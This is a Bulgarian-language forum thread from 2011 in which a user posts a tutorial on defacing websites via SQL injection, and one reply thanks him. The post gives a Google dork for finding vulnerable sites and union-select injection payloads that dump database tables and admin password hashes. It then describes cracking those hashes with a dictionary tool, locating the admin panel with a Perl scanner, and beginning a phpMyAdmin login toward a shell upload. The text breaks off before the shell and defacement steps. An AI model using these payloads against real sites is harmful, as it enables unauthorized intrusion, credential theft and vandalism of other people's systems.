2GOOD4U
2GOOD4U 1.6 Server's iP
cs.ko.tl:27015 Dust2
cs.ko.tl:27016 Aim
cs.ko.tl:27017 Awp
cs.ko.tl:27018 Italy2
cs.ko.tl:27019 5on5 #1

Join the forum, it's quick and easy

2GOOD4U
2GOOD4U 1.6 Server's iP
cs.ko.tl:27015 Dust2
cs.ko.tl:27016 Aim
cs.ko.tl:27017 Awp
cs.ko.tl:27018 Italy2
cs.ko.tl:27019 5on5 #1
2GOOD4U
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Пълен урок за deface през SQLi

2 posters

Go down

Нормална Пълен урок за deface през SQLi

Писане by hARDCORE Пон Апр 25, 2011 9:25 am

*********************************************************************************
DeMoN

*********************************************************************************

Здравейте!
Този път ще Ви обясня как се пробива сайт уязвим към SQLi, кракване на
хеша който ще вземем, намиране на админ панела, качване на шел и промяна
на index.php


1. SQL Injection Tutorial


Какво всъщност е SQL Injection: Това е метод чрез който можем да внедрим код при нефилтрирани данни към базата.


1. Сега нека да намерим сайт който е уязвим към SQL Injection. Отваряме google и заявяваме търсене за:
inurl:index.php?id=


Отворете произволен сайт. При URL бара след id=number слагаме +and+2=0 или '.

Ако сайта е уязвим ще излезе грешка от типа на:
mysql_fetch_object
mysql_imagesize()


Ако не е уязвим сайта страницата ще се рефрешне или ще препрати към началната страница!

Сега трябва да разберем колко е броя на колоните:

index.php?id=1+order+by+1--
index.php?id=1+order+by+2--
index.php?id=1+order+by+3--
index.php?id=1+order+by+4--
index.php?id=1+order+by+5--


При този случай ако Ви изкара грешка на index.php?id=1+order+by+4-- това означава че колоните са 8!

След като знаем броя на колоните може да направим проверка в коя таблица е дупката:
index.php?id=-1+union+select+1,2,3,4,5,6,7--

Забележете, че преди номера на id сега има знак минус!
Сега на страницата трябва да има удебелено число. В тази таблица е уязвимоста през която ще изкараме хеша.

Сега ще извършим проверка за версията на MySQL:
index.php?id=-1+union+select+1,@@version,3,4,5,6,7--

В моя случай резултата е:
5.0.77-lоg

Вече е време да намерим таблиците на базата:
index.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+tabl
e_schema=database()--


Резултата трябва да бъде изкарване на наличните таблици. Търсим таблица с име
users, password, admin или нещо подобно.

Сега да изкараме хеша и името на админа:

index.php?id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+името на таблицата--

Сега би трябвало да имате резултат от типа:
Admin:hash-a

2. Hash Decoding

Сега е време за разкодиране на паролата. За целта аз ползвам PasswordsPro:

[You must be registered and logged in to see this image.]


Заредете програмата:

Трябва да добавим речници от който да търсим стойноста на хеша:



[You must be registered and logged in to see this image.]


Сега търсите меню Dictionares:
[img]
[You must be registered and logged in to see this link.][/img]
За да добавите нови речници натискате с дясно копче в бялото поле и Add...

Сега потвърдете и затворете настройките. Отивате на Audit и избирате Simple Dictionary Attack:


[You must be registered and logged in to see this image.]


Сега натискате с дясно копче на голямото празно поле и избирате Add... за да добавите хаша:

[You must be registered and logged in to see this image.]


Вече можете да стартирате кракването на хеша!

3. Admin Panel Find (phpmyadmin)

Време е да намерим админ панела на сайта. За целта аз ползвам един perl скрипт:

[You must be registered and logged in to see this link.]

За
да стартирате скрипта ще Ви е нужен инсталиран Active Perl за Windows! В
Linux е вграден, но ако не стане може да го инсталирате и на Linux!


Отворете нов терминал за Linux и cmd за Windows. Аз ще дам пример с Linux тъй като ползвам него:

След като отворите пишете:

За Linux:


cd директорията
cd директорията в която се намира скрипта

Стартираме скрипта с команда:

perl name.pl [You must be registered and logged in to see this link.]

За
Windows всичко е по същия начин с едно изключение: Perl скрипта трябва
да бъде в папката на Perl bin която по подразбиране се намира в C:/Perl


Резултата от сканирането трябва да изглежда така:

[You must be registered and logged in to see this image.]


4. Shell Upload within phpmyadmin

След като е сме намерили админ панела идва време да качим и шел на сървъра!

Сега
отваряме phpmyadmin и ни иска администраторска валидация. В login
формата трябва да въведем администраторския никнейм и паролата която по-
рано разкодирахме!

ДО ДОВЕЧЕРА!
hARDCORE
hARDCORE
Power user

Male Zodiac : Sagittarius Брой мнения : 297
Отсенка : 1337
Rep : 10
Регистриран на : 13.01.2010
Age : 27
Местожителство : PLOVDIV

точки
точки:
Пълен урок за deface през SQLi Left_bar_bleue652/1000Пълен урок за deface през SQLi Empty_bar_bleue  (652/1000)

https://bginter.bulgarianforum.net

Върнете се в началото Go down

Нормална Re: Пълен урок за deface през SQLi

Писане by Cs-Adrenalin Пет Яну 27, 2012 9:04 pm

Много, ама много хубав урок!
П.С. А и братле писах ти ЛС! Skype: pr0_z0n3_1, ако е забранено даването на скайп се извинявам!

Cs-Adrenalin
Статист

Брой мнения : 1
Отсенка : 1
Rep : 0
Регистриран на : 27.01.2012

Върнете се в началото Go down

Върнете се в началото

- Similar topics

 
Права за този форум:
Не Можете да отговаряте на темите